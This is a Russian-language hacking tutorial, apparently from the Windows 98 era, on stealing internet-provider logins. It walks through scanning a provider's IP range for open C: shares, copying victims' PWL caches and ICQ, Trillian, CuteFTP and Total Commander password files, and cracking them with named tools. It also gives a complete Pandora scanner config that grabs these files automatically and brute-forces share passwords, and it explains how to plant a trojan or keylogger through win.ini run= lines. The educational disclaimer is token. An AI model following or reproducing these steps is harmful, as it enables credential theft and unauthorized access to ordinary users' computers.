FreeInet
Главная Вперёд >

Данный хелп посвящен всем пользователям Интернета.

FreeInet Help 3.0 Logo

Best View at 1024x768 resolution


Внимание

Disclaimer.
< Назад Главная Вперёд >

ВНИМАНИЕ

Вся информация в данном документе предоставлена в образовательных целях. Для того, чтобы показать как плохо защищены пользователи.
Авторы не несут никакой ответственности за действия лиц использующих информацию из данной статьи.
Если вы не согласны с изложенным выше, то немедленно закройте, а затем удалите данный файл.


Атака
< Назад Главная Вперёд >

В этом разделе речь будет идти о методах атаки на жертву, о троянах, софте и т.д.


Теория.

Как известно, знание - главное оружие хакера, вот его получением мы и займемся.

Историческая справка.

Все началось в 1985 году, когда Microsoft выпустил первую версию Windows, тогда еще оболочки для DOS. Никто и представить не мог, что всего через 15 лет два из трех компьютеров, если не больше, будут работать под управлением OS Windows. Система задумывалась как максимально дружественная к пользователю, что называется 'для домохозяек'. Эта доктрина сохраняется во всей серии Windows 95/95OSR2/98/98SE/ME, где все сделано для того, чтобы пользователю было максимально удобно работать. Безопасность была принесена в жертву удобству и простоте. Потом конечно была NT c гораздо более серьезной защитой и разделением доступа к файлам, но зачем домохозяйке такие сложности? Забота о пользователях в сумме с небрежной реализацией механизма аутентификации дает многим и многим любителям халявного интернета возможность получить желаемое, неграмотным пользователям шанс потерять некоторое количество денег, а армии врачей-практологов дополнительную работу в лице провайдеров.

Пользователи и пароли.

Самый ненадежный элемент в любой системе - это человек. Особенно если этот человек слабо разбирается в компьютерах и не задумывается о безопасности своей системы, если для него вообще существует такое понятие. Большинство пользователей не понимает, что пароль есть средство защиты. Средний пользователь имеет очень плохую память или просто боится забыть пароль, поэтому вводит что-нибудь легко запоминающееся, вроде 12345, qwerty, gfhjkm, password, имя любимой кошечки, девушки :) , свой же логин, а если воможно, то вообще не вводит. Чтобы, опять же, не забыть десяток паролей, введенных в разных местах, средний пользователь имеет один единственный пароль на все случаи жизни. Иногда средний пользватель все же имеет много паролей, причем хорошей сложности, но, чтобы не забыть, хранит их в текстовом файле. 'Пароль среднего пользователя' подбирается без особого труда. Только не надо спешно менять все пароли, ведь перебор - не единственный способ их получения. В последней части содержатся рекомендации по повышению уровня безопасности системы. Грамотно же составленный пароль, включающий строчные и прописные буквы, цифры, прочие печатные символы можно подбирать многие тысячи лет и не добиться результата. Это связано с очень быстрым ростом количества паролей, имеющих заданное число символов. Например, односимвольных паролей из маленьких английских букв существует ровно 26, двусимвольных - 676, восьмисимвольных - чуть больше 200 миллиардов, с такой же скоростью возрастает и время перебора методом 'грубой силы'. При скорости 50000 паролей в секунду (подбор пароля к парольному кэшу Windows на Pentium-200) времена перебора получаются следующие:

Длина пароля 26 [a..z] 36 [a..z]+[0..9] 70 (все отображаемые)
4 instantly instantly 8 minutes
5 4 minutes 20 minutes 9 hours
6 100 minutes 12 hours 27 days
7 45 hours 18 days 5 years
8 24 days 21 months 371 years
9 48 days 65 years 26,000 years

Очевидно, что время перебора обратно пропорционально тактовой частоте процессора, т.е. обратно пропорционально скорости перебора, так что даже на полуторагигагерцовом процессоре эти числа не уменьшатся до нескольких часов. Из этих соображений следует, что перебор стоит начать со словаря, составленного из стандартных паролей, а затем уже переходить к методу грубой силы. Самый простой пароль - общеупотребительное английское слово (love, sex, secret, god :)), самый сложный - случайный набор символов ( f1gH@Eb{ ).

Парольный кэш Windows.

Чтобы помочь несчастным пользователям со слабой памятью Microsoft придумал парольный кэш - систему сохранения паролей. В кэше служба удаленного доступа (Remote Access Service) сохраняет логины и пароли телефонных соединений, Windows - пароли для доступа к общим ресурсам и много чего еще. Все это богатство хранится в зашифрованном виде в файлах C:\%WINDIR%\*.pwl, где имя файла получается из имени пользователя укорачиванием до восьми символов и, при наличии нехороших символов вроде пробела, еще некоторыми преобразованиями. В любом случае, соответствие имя пользователя - имя парольного файла хранится в файле system.ini. Размер пустого парольного кэша 688 байт. Шифрование происходит алгоритмами MD5 и RC4. В Windows 95 OSR1 шифрование было организовано небрежно, что позволяло извлекать содержимое, не зная пароля, за сотые доли секунды (программа Glide). В остальных версиях для дешифровки нужно знать пароль и полное имя пользователя. Здесь на сцену со всеми вытекающими последствиями вламывается 'пароль среднего пользователя'. Используя соответствующие инструменты (например, RePWL или мой любимый PWLHack) можно попытаться подобрать пароль, но если пользователь окажется не средним, то процесс перебора может занять значительное время, измеряемое даже не годами, а сотнями и тысячами лет. При наличии физического доступа к компьютеру задача расшифровки кэша становится тривиальной - после того, как требуемый пользователь залогинился в систему достаточно запустить программу, запрашивающую кэшированые пароли у самой системы, например, Phone Book Viewer, который AVP обзывает Trojan.PSW.Hackof. Подробнее на эту тему можно почитать по адресу http://www.passwords.ru/.

А как же телефоны?

В парольном кэше Windows можно найти пару логин/пароль провайдера, но где же телефон?
Microsoft предусмотрел и это. Windows хранит настройки соединений, включая телефоны, которые отображаются
в папке 'Удаленный доступ к сети', как и другую личную информацию пользователя, вроде паролей Outlook в реестре, секция:

HKEY_CURRENT_USER\RemoteAccess\Addresses.

Содержимое же ключа HKEY_CURRENT_USER физически хранится по адресу %WINDIR%\user.dat, правда не в текстовом виде. Файл user.dat может занимать от 100Kb до 2Mb. Извлечь значение ключа позволяет стандартная программа regedit, запущенная в режиме эмуляции ms-dos. Например, команда:

regedit /R:user.dat /E raccess.reg HKEY_CURRENT_USER\RemoteAccess\Addresses

записывает содержимое секции HKEY_CURRENT_USER\RemoteAccess\Addresses в
файл raccess.reg. Его содержимое будет иметь вид REGEDIT4

[HKEY_CURRENT_USER\RemoteAccess\Addresses]
"mtu"=hex:f5,f6,84,86,b3,b4,b4,b4,94,b4,b4,b4,95,b4,b4,b4,b3,b4,b4,b4,98,\
.........
b4,b4,b4,b4,b4,b4,b4,b4,a4,b5,b4,b4,b4,b4,b4,b4,b4,b4,b4,b4,b4,b4,b4,b4.

Из этой последовательности байт трудно что-то понять, но этого и не требуется. Достаточно внести содержимое этого файла в реестр и в папке 'Удаленный доступ к сети' появится новый значек.

Общие ресурсы (Shared resources).

Опять же заботясь о пользователях, Microsoft придумала сеть Microsoft (Microsoft Network), которая позволяет пользователю в локальной сети или сети интернет с равным успехом получить доступ к файлам и принтерам компьютера, находящегося в соседней комнате и в хижине вождя племени Зулусов где-нибудь в Африке. Чтобы все это заработало надо установить:

клиент для сетей Microsoft,
службу доступа к файлам и принтерам

сетей Microsoft - и в случае dial-up соединения поставить в его настройках галочку "Войти в сеть". Далее можно как пользоваться чужими ресурсами, так и предоставлять доступ к своим. Есть несколько способов подключиться к чужим ресурсам:

набрать ip или сетевое имя во вкладке 'Найти компьютер' и открыть список его общих ресурсов в проводнике, либо командой 'подключить сетевой диск' сделать ресурс удаленной машины доступным как локальный;

выполнить одну из команд \\<сетевое имя>или \\<ip адрес>при этом в проводнике откроется список общих ресурсов;

воспользоваться командой NET - команда вида

NET VIEW \\<ip адрес>либо вида
NET VIEW \\<сетевое имя>покажет список общих ресурсов
nbsp;
удаленного компьютера, включая скрытые, а строка вида

NET USE x: \\<ip адрес>\<имя ресурса>
или
NET USE x: \\<сетевое имя>\<имя ресурса>

смонтирует (mount) ресурс с заданным именем на локальный диск X:. Иногда Windows постоянно выдает ошибку 'Не найдено сетевое имя', в этом случае нужно помочь системе, добавив в файл lmhosts строку вида

<ip adress> <сетевое имя> #PRE.

Ресурсы, имена которых заканчиваются на $ считаются скрытыми и не отображаются в списке общих ресурсов проводника, а также некоторыми сканерами. Кроме определяемых пользователем существуют ресурсы IPC$ (InterProcess Communication), который является служебным и доступа к файлам не предоставляет и ADMIN$ (в Windows 98/NT/2000), который позволяет получить полный доступ к системным ресурсам c$, d$... Делать доступными можно целые диски, отдельные папки и принтеры, доступ к файлам может быть двух типов: только чтение (Read only) и полный (Full) - и, естественно, ограничивается паролем. Эта защита в Windows 95/98/ME, как будет дальше видно, чисто номинальная и защищает только домохозяек от тех же домохозяек. Делает её таковой, опять же, небрежность реализации, а именно: пароль переводится в верхний регистр, усекается до 8 символов и в процессе аутентификации проверяется посимвольно. Первые два пункта еще не смертельны - они просто существенно сокращают пространство возможных паролей, но третий сводит всю защиту на нет, позволяя подбирать пароль за время не превышающее нескольких минут даже при плохой связи. Итак, пользователь вводит пароль и Windows начинает передавать его знаки, один за другим, удаленной машине. Она же, не дождавшись ввода последнего символа начинает сверять введенный пароль с правильным и как только встречает неверный символ отсылает назад сообщение об ошибке. Таким образом, пароль можно подбирать посимвольно, как в фильмах про хакеров, что успешно делают программы типа LANGuard Network Scanner и xIntruder. В Windows NT/2000/XP защита уже не детская: нужно знать кроме пароля еще и логин, так что подбирается только 'пароль среднего пользователя', также есть шанс, что администратор любезно оставил какой-нибудь стандартный аккаунт.

Пользователи и общие ресурсы.

Средний пользователь достаточно ленив и имеет достаточно знаний, чтобы пользоваться таким полезным механизмом как общие ресурсы, но он недостаточно умен, чтобы понять как делать это, не подвергаясь опасности быть обкраденным. Он делает доступным всему миру свой диск С:, с паролем или без, на котором стоит его звонилка, лежит парольный кэш, любимая ася, список паролей, документы... Иногда, чтобы что-то туда закачивать, дает даже полный доступ. По моим личным наблюдениям таких пользователей 3-5%. Для автоматизации обнаружения этих пользователей существуют сканеры, которые опрашивают заданный диапазон ip адресов на предмет общих ресурсов. Например, xSharez, Legion, LANGuard Network Scanner, Essential Nettools.

Сервис whois.

Как известно, у интернета нет владельца, но кто-то все-таки должен устанавливать правила, принимать протоколы и т.д. Этим занимаются некоммерческие организации. RIPE отвечает за распределение ip адресов и имеет огромную базу данных, которая содержит информацию о тех, за кем числятся все распределенные ip адреса. Она содержит название организации, диапазон выделенных ей ip адресов, почтовый адрес организации, ip маршрутизаторов и некоторую информацию о контактных лицах. Эта база данных является публичной, т.е. любой желающий может сделать к ней запрос с помошью програм, работающих по протоколу whois, например, Smart Whois, либо через скрипт, например, по адресу http://www.ripe.net/perl/whois/.

Например, для ip 213.180.194.130 (Yandex, www.raya.ru) результат выполнения запроса имеет вид:

inetnum: 213.180.194.0 - 213.180.195.255 - диапазон ip
netname: COMPTEK-NET2
descr: CompTek International, inc. - название организации
descr: Gubkina st.3, Moscow, Russia - её адрес
country: RU
admin-c: VLI1-RIPE
tech-c: KBG2-RIPE
status: ASSIGNED PA
notify: noc@comptek.ru
mnt-by: COMPTEK-MNT-RIPE
changed: wawa@comptek.ru 20001121
source: RIPE

route: 213.180.192.0/20 - маршрутизатор
descr: CompTek network / special
origin: AS13238
notify: noc@comptek.ru
mnt-by: COMPTEK-MNT-RIPE
changed: wawa@comptek.ru 20010123
source: RIPE

person: Vladimir L Ivanov - контактное лицо
address: CompTek International, inc.
address: Gubkina street 3
address: Moscow
address: Russia
phone: +7 095 785 2525
fax-no: +7 095 785 2526
e-mail: wawa@comptek.ru
nic-hdl: VLI1-RIPE
mnt-by: COMPTEK-MNT-RIPE
changed: wawa@comptek.ru 19990212
source: RIPE

Автозагрузка.

Во время загрузки Windows стартует некоторое количество програм, например AVP Monitor, MSOffice Fastload, всякие троянцы, угнездившиеся в системе, ICQ NetDetect...
Существует несколько способов заставить программу запускаться при старте Windows. Самый тривиальный - добавить её в группу Автозагрузка (Autorun) в меню 'Пуск'. Как известно, в этом самом меню отображается содержимое папки
C:\%WINDIR%\Главное меню\. Этот способ очень прост, но пользователь может легко заметить лишний ярлычёк. Но если этот ярлык сделать скрытым, то пользователь ничего не увидит.
Новые программы, как и трояны, в большинстве запускаются из реестра (registry), ключи

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run*,
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run*,

но этот способ в Windows 95/98 нельзя использовать удаленно. Про autoexec.bat и winstart.bat, надеюсь, упоминать не надо. Также можно использовать способ, применявшийся еще в ранних версиях Windows, когда реестр заменяли ini-файлы. Чтобы запускать программу из win.ini, нужно в секцию [Windows] добавить строчку вида run=<имя файла с путём>.

Борьба со звездочками.

Метод избежать подглядывания пароля при вводе был придуман, видимо, одновременно с самим паролем: на экран вместо вводимых символов либо не выводится ничего, либо все символы заменяются на какой-нибудь один, например ту же '*'. Microsoft не обошел эту меру безопасности своим вниманием - Windows имеет поддержку особых полей ввода, отображающих вместо символов '*'. Обработка введенного пароля, как правило, осуществляется после того, как пользователь сообщит системе, что ввод закончен, например, нажав кнопку Ok. Естественно напрашивается вывод, что когда на экране отображаются звездочки пароль в это время преспокойно хранится в памяти, причем в открытом виде. Само по себе это еще ничего не дает, если бы не привычка некоторых приложений отображать в полях такого типа ранее сохраненные пароли, давая пользователю возможность изменить ввод налету. Таким образом приложение само расшифровывает пароль, остается только прочитать его, с чем успешно справляются программы типа OpenPass или Behind The Asterisks, и Pass2k для Windows 2000 & XP

Мультилогины.

В природе существует такое понятие как мультилогины. Это такие логины, по которому может сидеть одновременно несколько людей. Некотрые провайдеры предоставляют такую услугу. Владельцу они обходятся в кругленькую сумму, но вам оно не все равно? Так как же определить мульти он или нет.

Первый признак это то, что вы в любое время спокойно заходите в сеть. Иногда, когда вы пытаетесь зайти не по мультилогину после проверки логина может появиться окошко вход в сеть, где windows предложит вам ввести логин и пароль( В XP это будет ошибка 691) Это характерный признак того, что к сожалению логин не является мульти. Так же это может просто означать, что логин уже не рабочий.

Признак второй. Во время того, как вы сидите в сети. Попробуйте попинговать человека, у которого вы добыли своим трудом логин, естественно это на случай если он имеет статистический ип. А если нет, то просто попробуйте посканить сеть на имя компьютера скоторого был добыт аккаунт . Вы ведь его запомнили? ;-)

Ну, вот, пожалуй, и все.


Идея

Ну вот, все необходимые знания есть, так что в этой части на самом деле нужды нет.
Если же идея так и не родилась, читаем дальше.

Стратегия.

Итак, задача получения доступа в инет за чужой счет сводится к получению логина/пароля провайдера, что дает dial-up доступ.
Логин/пароль, если не рассматривать очень доверчивых пользователей, можно получать двумя способами - перехватывать при вводе и добывать из парольного кэша. Содержимое парольного кэша можно, опять же, получить достав сам кэш (методами социальной инженерии, с помощью трояна или же через общие ресурсы) либо выпросив его содержимое у системы (при наличии физического доступа или опять же с помощью трояна). Подробно я остановлюсь на методах, использующих любезно предоставленный пользователями доступ к общим ресурсам.

Возможная тактика.

Самый простой способ - просканировать подсеть определенного провайдера, чтобы найти те самые 3-5% пользователей, при этом автоматически известно логин/пароль какого провайдера получен. Схема действий при этом выглядит следующим образом:

Выбираем в своем городе какого-нибудь провайдера; с помощью сервиса whois или из других источников (www.google.com.ru) узнаем диапазон принадлежащих ему ip;
сканируем весь либо часть диапазона с помощью сканера общих ресурсов, находим пользователей с открытым диском C:.

Пароль, естественно, существенной преградой не является;
сливаем файлы *.pwl и system.ini на случай, если имя пользователя превышает 8 символов (Не тратьте время на копирование и просмотр файлов Rna.pwl . В этом файле вы ничего не найдёте, кроме параметров модема. И ещё нам не нужны файлы .pwl размером меньше 720 байт. Потому что в них нету паролей. От 688 до 719 байт это файлы pwl тех юзеров, которые не ставят галочку в окошке "запомнить пароль")
расшифровываем кэш и получаем требуемые логины/пароли.

Ищем файл tree.dat из пакета программы CuteFTP 4.x В данном файле хранятся пароли от тех сайтов к которым пользователь имеет доступ через данную программу (расшифровывается программой PwlTool 6.5x)

Также ищем папку ICQ/200хb. В данной папке хранятся файлы *.dat, из которых ты можешь достать пароли к UIN`ам данного пользователя. (расшифровывается программой ICQr Information v1.5 или Advanced ICQ Password Recovery (вторая работает быстрее), на сегодня лучшая Icq History Reader)

Еще если у жертвы стоит Trillian 0.7* или 1.*, то берем из папки Trillian\users\* файлы aim.ini(хранятся данные о AIM и ICQ) и msn.ini и ищем строку password=<зашифрованный пароль> и расшифровываем его при помощи TrillKill, как следствие получаем логин и пароль пользователя от любого сервиса которым данный пользователь обладает.

Также можно получить доступ ко всем сайтам жертвы, если жертва использует Windows Commander он же Total Commander, для этого нужно уносить с диска жертвы файл wcx_ftp.ini обычно он расположен в папке Windows, но иногда может находиться в папке с самой программой. После того как вы скопировали файл к себе на диск, вы должны им заменить ваш файл при условии что вы используете win commander, или же можно открыть файл wcx_ftp.ini и добавить оттуда строки в ваш файл. После этого вы сможете коннектиться к сайтам жертвы и делать с ними всё что хотите. Возможно у вас появился вопрос, как узнать пароль от фтп?, для этого смотрите раздел Теория>Борьба со звездочками.

Вариант тактики.

Если обнаруженый диск открыт на запись, то машину можно заразить трояном который, например, отсылает пароли по почте. Эта вариация работает в меньшем числе случаев, но действует наверняка - не требуется расшифровывать pwl, это проделает Windows.

Нестандартные звонилки.

Также некоторые пользователи используют нестандартные звонилки, например Edialer, так что стоит интересоваться их конфигурационными файлами. Тот же Edialer хранит логины и пароли в файле %WINDIR\Edialer.ini в зашифрованом виде, но алгоритм шифрования прост до безобразия: например, пароль 11111 в закодированом виде выглядит как 12345. Многие звонилки cами расшифруют пароль и покажут его, правда, в виде звездочек.


Essential Net Tools

Запустите программу. В левой колонке, нажимаете на NBScan Как видно на рисунке.

Essential Net Tools

В нижнем окошке, где написано Starting IP address:, введите начальный IP.
В нашем случае это 212.38.112.1 Автоматически заполнится нижнее окошко - Ending IP address. И нажимаете на кнопку Start.
Программа начнёт сканировать все подключённые к этому диапазону в данное время компьютеры. После окончания сканирования смотрите на результаты

В колонке RS есть надписи YES и NO. Сразу же уберите взгляды с NO . И можете больше не обращать на них внимания. Нам нужны только YES. Но и это ещё не всё.
В самой последней колонке, где написано MAC Address , видно мнооооооого цифр.Опять же, уберите взгляды с чисел, начинающимися на 00: Это системы Windows 2000, Linux и другие. С них вы всё равно ничего не получите.
Нам нужны OS - Windows 95, 98, Me.
Цифры типа 44:45:53:54:... это и есть нужные нам оськи . В них то мы и будем искать расшаренные диски С. Выбрав первую жертву, например :

INTERNET
HURRIYYAT YES
212.38.112.2 44:45:53:54:00:00

тыкаете на него правой кнопкой мышки и нажимаете Open Computer Система при этом может на 2-3 минуты затормозить, винт затрещит, начнёт думать. Не волнуйтесь, это нормально. Откроется панель Explorer (точно такая же, как когда вы открываете "Мой компьютер")
Смотрите на названия папок, открывшихся там. Если там есть папка С, то она нам и нужна. Некоторые юзеры могут переименовать диск С на своё имя или фамилию или ещё как - либо. Так что если диска С вы не увидите, а вместо него увидите допустим папку "Вася", то стоит и её просмотреть (но папок там может и не быть, в этом случае сразу же переходите к следующей жертве ). А если всё вышеуказанное вы увидели, то не спешите радоваться ;) Это пока может ещё не Эврика. Закройте окно Explorer и нажмите в левой колонке ENT - a, на кнопку Shares. Внизу , в окошке Share name: введите следущее \\212.38.112.2\C

Essential Net Tools

Это IP адрес и диск С, который вы увидели когда открывали комп жертвы. А в правом, нижнем всплывающем окошке(Local drive), выберите любую из букв. Это будет ваш временный локальный диск. Нажмите на кнопку "Mount", т.е. подключиться. Опять же комп может затормозить на пару минут. И , следующее, что вы увидите, - появится надпись "connection succesfull", что означает подключено чего мы и добивались.
Но, может произойти и хреновое. Может появиться надпись - неправильный пароль. В этом случае попробуйте эту - последнюю процедуру ещё раз . Программа иногда ошибается . Но если и во второй и в третий раз вы увидели надпись о неправильном пароле, это будет означать , что он установил пароль на диск С . В этом случае можете переходить смело к следующему клиенту.
Далее, после всех этих процедур , открываете программу FAR manager , и начинаете просматривать и копировать нужное из его диска С.

Essential Net Tools


LANguard Network Scanner

Следующая программа LANguard Network Scanner. У неё тот же принцип действия, только есть дополнительные возможности, такие как вывод информации о MAC, также portscan и bruteforce для запароленных дисков, если пользователь оказался чуть умнее. Сейчас версия программы 3.1.13, и его функции несколько поменялись, теперь это полноценный сканнер безопасности, но функция поиска расшаренных ресурсов осталась.

При нахождении запароленного диска С взламываем пароль bruteforc`ом и подключаем как сетевой диск к своей машине, а дальше по шаблону. Единственный минус - некоторое подвисание программы при сканировании.
Также программа имеет удобное контекстное меню.

LANguard Network Scanner


Legion

Самая простая из них - это знаменитый Legion (поищи ее в интернете, но она уже морально устарела, поэтому я ее подробно описывать не буду).
Просто запусти его, введи начальный и конечный IP, жми Scan. И получаешь список бакланов с расшаренными ресурсами, выделяешь диск С, кликаешь Mount, и получаешь сетевой диск. Затем ищешь pwl или другие необходимые тебе файлы, затем копируй их к себе на винт и расшифровывай.


Pandora Automatic Scanner

Можно сказать - это следующее поколение PWL-Grab`a.

Этот сканер примечателен тем, что для его работы вам нужно только запустить файл exe, и ждать когда файлы которые вы указали в конфиге сами приплывут к вам на диск.

Системные требования которые указывает автор программы:

ОС: 95/98/Me/NT/2000/XP/.NET.
CPU: 400Mhz или лучше.
Память: 32 или больше.
Сеть: 56k или выше.

Впрочем у меня вроде нормально работало на AMD-K5-PR166, 32ram, win98. Но вот автор пишет что лучше не использовать программу на win98, т.к. на ней будет сканится очень медленно. А вот про коннект это верно, желательно иметь коннект побыстрей.

Функции программы:

- Сканирует все хосты в интернете (до 2^32 хостов).
- Уникальная система сканирования (255 хостов за 5 секунд).
- Автоматическое копирование файлов.
- Автоматический взлом паролей на расшаренных ресурсах.
- Автоматическое повторение сканирования.
- Раздельный модуль интерфейса и сервера с полным контролем по сети.
- Скрытый или обычный режим работы
- Рассылка результатов сканирования на e-mail или ftp (логи + файлы).
- Полностью конфигурируемый.
- Дружественный и понятный интерфейс.
- Отображение найденных файлов и компьютеров в режиме реального времени.
- Монтирование дисков.
- Просмотр загруженных файлов, с сортировкой по имени, типу, дате ,IP адресу.

Теперь остановимся на конфиге (он будет написан в самом низу), предлагаю вам свой вариант, но потом вы можете его(конфиг) переделывать, чтобы она(пандора) скачивала другие файлы с шаров.
Мой конфиг настроен на копирование файлов от ICQ2002a, ICQ2003a, PWL, System.ini, Edialer.ini

Останавлюсь лишь на участке конфига:

;addradvN(n=1..99):диапазоны хостов для сканирования, класс С или B
;класс С
;класс B
;одиночный хост

addradv1=1.2.3.1 - 1.2.3.255

addradv1=1.2.3.1 - 1.2.3.255 - Это просто пример диапозона как нужно его вписывать в конфиг, точно также вы можете ещё добавить другие диапозоны, и пандора после скана одного диапозон перейдёт на скан другого.

Ниже пример как можно делать.
addradv1=1.2.3.1 - 1.2.3.255
addradv2=12.13.14.1 - 12.13.14.255
addradv3=13.14.15.1 - 13.14.15.255

и так можно сделать до 99 строк!

Сайт автора - В данный момент на реконструкции
Здесь можно скачать любую версию программы

Pandora Automatic Scanner

Pandora Automatic Scanner

Конфиг (скопировать это в файл pandora.in и кинуть в папку с Пандорой):

; pereimenovat` v pandora.in

[main]
delaymainscan=0
delaymail=600
port=4003
logfontsize=0
logfont=Ms sans serif
hideme=0
autorun=0
listen=0
detailerror=1
checkinterface=1
checkonline=0
installasservice=0
servicename=Pandorakernel
servicedesc=Pandora (Automatic netbios audit system)
test=ff

;addradvN(n=1..99):диапазоны хостов для сканирования, класс С или B
;класс С
;класс B
;одиночный хост

addradv1=1.2.3.1 - 1.2.3.255

[scan]
priority=1
delaycreate=1
delaybeforecheck=0
pingtimeout=14000
skipscan=1
skipping=0
connecttimeout=15000
numparallel=20

[mail]
sendmail=0
tostr=To: 33
fromstr=From: 22
subject=Subject: 11
emailaddress=youremail@yoursmtp.com
maxlogfilesize=2000
packenable=0
packcmd=gzip -c >"$arc$" <"$file$"
mailserver=smtp.server.com

[share]
numparallel=10
;locpath=string. Строка показывающая куда будут копироваться
;скачиваемые файлы.
locpath=C:\geted_PWL\
skipenum=0
createipfolders=1
getipname=1
bruteforce=1
passchars=0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ[ ]{}=*-+~!@#$%^&()<>/\,;:"'
udptimeout=5000
standartmode=1
alternatemode=1
skipifnotwindir=1
skipsharelist=A,a,PRINTER2,PRINTER1,PRINTER$,HP,VENTAFAX,LEXMARK,HP,EPSON,OKI,OKIPAGE,XEROX,HP6L
savename=\$ip$\$filename$.$ext$
priority=1

[FileSection1]
itemname=ini
path=$windir$
filename=system.ini
minsize=0
maxsize=200000

[FileSection2]
itemname=pwl
path=$windir$
filename=*.pwl
minsize=700
maxsize=200000

[FileSection3]
itemname=edialer
path=$windir$
filename=edialer.ini
minsize=0
maxsize=0

[fileSection4]
itemname=icq 2002a
path=\progra~1\icq\2002a\
filename=*.dat
minsize=0
maxsize=0

[FileSection5]
itemname=icq 2003a
path=\progra~1\icq\2003a\
filename=*.dat
minsize=0
maxsize=0


Pwl-grab

И наконец, самая лучшая прога для кражи чужих pwl:

pwl-grab - это проста мечта для халявщика, просто запусти ее, укажи необходимые параметры, и вперед. Эта прога сама подключится к расшаренным дискам, и скопирует файлы pwl и system.ini в указанную директорию.

Pwl Грабитель


PWLTool

PWLTool (RePWL)
< Назад Главная Вперёд >

Теперь о проге PWLTool последняя версия 6.90. Её можно скачать с оффсайта: http://soft4you.com/ Или поискать на www.bestfilez.net. Так вот, устанавливаете эту прогу, крякаете её и едете дальше. Скопированный pwl, например Server.pwl,

PWLTool

запускате двумя щелчками мышки, (как обычно вы запускаете любую программу или файл). В открывшейся программе

PWLTool

PWLTool нажимате кнопку CheckPass, или, если появится сообщение типа (это имя незарегистрировано в вашей системе, хотя это маловероятно), нажмите CheckPassFast и прога начнёт искать пароль на зпароленный PWL. Далее откроются вашему взору пароль или все пароли жертвы. Но может случиться и такое, что при нажатии кнопки выйдет сообщение о неправильном пароле на PWL. В этом случае нажмите на кнопку "SearchPasswordFast" и программа начнёт искать пароль pwl-ки. Но и этот вариант случается довольно редко (процентов 20 пользователей при включении компьютера, вводят пароль). У таких пользователей как раз и стоит пароль на PWL-ку. Если программа не найдёт пароль, увеличьте значение в окошке "To:" это кол-во знаков в пароле или измените знаки в окошке "Charset string". Также можно попробывать перейти на вкладку SmartForce, где находится другой переберальщик паролей, иногда у меня получалось найти пароль только им, причём случалось это менее чем за 5мин.

Внимание: При увеличении этих значений, увелчится и время поиска. Итак, если всё нормально, программа откроет все
пароли этого PWL. В окошке видны все пароли и Логины (имя пользователя).

PWLTool

Вот например:
-----------------------------------------
Dial-up:'*Rna\CS3 Connection\71363,13'
Password:'REVERE*ROBUST'
-----------------------------------------
Где CS3 Connection - название соединения, 71363,13 - это ЛОГИН пользователя. И как вы наверное уже догадались, REVERE*ROBUST - это пароль пользователя для входа в инет. Вот в принципе и все, о PWL, кстати в PWLTool есть кнопка Adv, при нажатии на нее вам откроются дополнительные возможности для расшифровки файлов edialer.ini и tree.dat.
Также если выбрать меню Tools>Additional Passwords>More выбираем программу, указываем файл, и все все логины и пароли у вас.


Shared Resource Scanner

Еще одна программа Shared Resource Scanner 6.x, самая быстрая программа в данном роде, есть также bruteforce к дискам, и многие другие фишки. На момент написания статьи версия программы изменилась до 6.4 beta, и автор отказался от дальнейшего ее развития из-за проблем с законом.

Shared Resource Scanner

Shared Resource Scanner

Shared Resource Scanner


xSHaReZ

Следующая программа xSHaReZ принцип действия почти тот же, использует для взлома паролей к дискам прогу xIntruder. Очень быстро справляется с задачей подбора паролей к запароленным дискам.

xSHaReZ xIntruder


Методы

Еще один способ. Добычи PWL состоит в подсовывание объекту трояна. Но сначало следует заметить вот что:

Статья 273.

Создание, использование и распространение вредоносных программ для ЭВМ

1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами - наказываются лишением свободы на срок до трех лет со штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев.
2. Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок от трех до семи лет.

Теперь рассмотрим моменты, в каких случаях следует использовать трояны:
1) Вы залезли на компьютер жертвы, скопировали PWL и system.ini. Но все равно не можете его взломать. Такое иногда случается. Ну, например слишком большой пароль на PWL, который придется взламывать очень и очень долго.
2) Вы все скопировали, как надо открыли файл PWL, а там нужного вам пароля не оказалось.
3) У жертвы вообще нет шаров, и придется впаривать ему троян другим способом.

Теперь рассмотрим попарядку как быть в каждом случае.

1) Итак мы заходим на компьютер и просто копируем, троян на чужую машину. Ну, например, в папку windows или еще дальше windows\systems. Потом берем и открываем файл win.ini, он лежит в папке windows\. В самом начале этого файла мы увидим строчки load= и run= , и прописываем там полный путь к трояну. Например, если мы поместили троян в папку window и он имеет название, скажем bad.exe (лучше конечно, другое давать имя). Тогда будет load=c:\windows\bad.exe или run=c:\windows\bad.exe. Как вам больше нравится :-)

Можно поступить проще запихнуть троян в автозагрузку и ничего нигде не надо прописывать, но тогда ссылка на него появится в пуск-программы-автозагрузка, что не желательно. (Но если придать файлу трояна статус СКРЫТЫЙ, то в Автозагрузке ничего не отобразиться). Какие трояны следует использовать в этом случае. Те, которые высылают расшифровывают PWL, а также файлы программ дозвоньщиков, в которых хранятся пароли. В зависимости от троянов пароль может высылаться на мыло или сохранять свои результаты на диске жертвы в виде лог файла или чего-то похожего.
Я приведу в пример такого трояна MOscow State trojan. Был опробован лично мною в целях опыта, с моим другом. С его согласия конечно. Свои функции выполнил, кроме одной, но она не имеет большого значения. Следует сказать, что есть такой троян с названием Наеби соседа. Он отсылает пароли не только вам на мыло, но и на мыло его создателя.

2) В этом случае сперва попробуйте полазить по компьютеру, потому что некоторые пользователи не сохраняют пароли в PWL, а просто хранят его на диске в открытом виде. Чаще всего или на Рабочем столе или в Моих документах. Еще пароли могут скрываться в файлах *.scp. Некоторые провайдеры в разделах в помощь пользователю пишут, как подключаться через скрипт, и некоторые конструкции скриптов включают пароли и логины в открытом виде. Так что обращайте внимание на такие файлы. Они могут находится тут *:\Program Files\Accessories, а могут и где-то еще.:-)
Нету? Ну да ладно. Нам понадобятся так называемые тряны keyloggerы они отлавливают комбинацию вводимых цифр и букв нажатых на клавиатуре. И также либо отсылают на мыло, либо хранят на диске жертвы. Способ установки такой же.
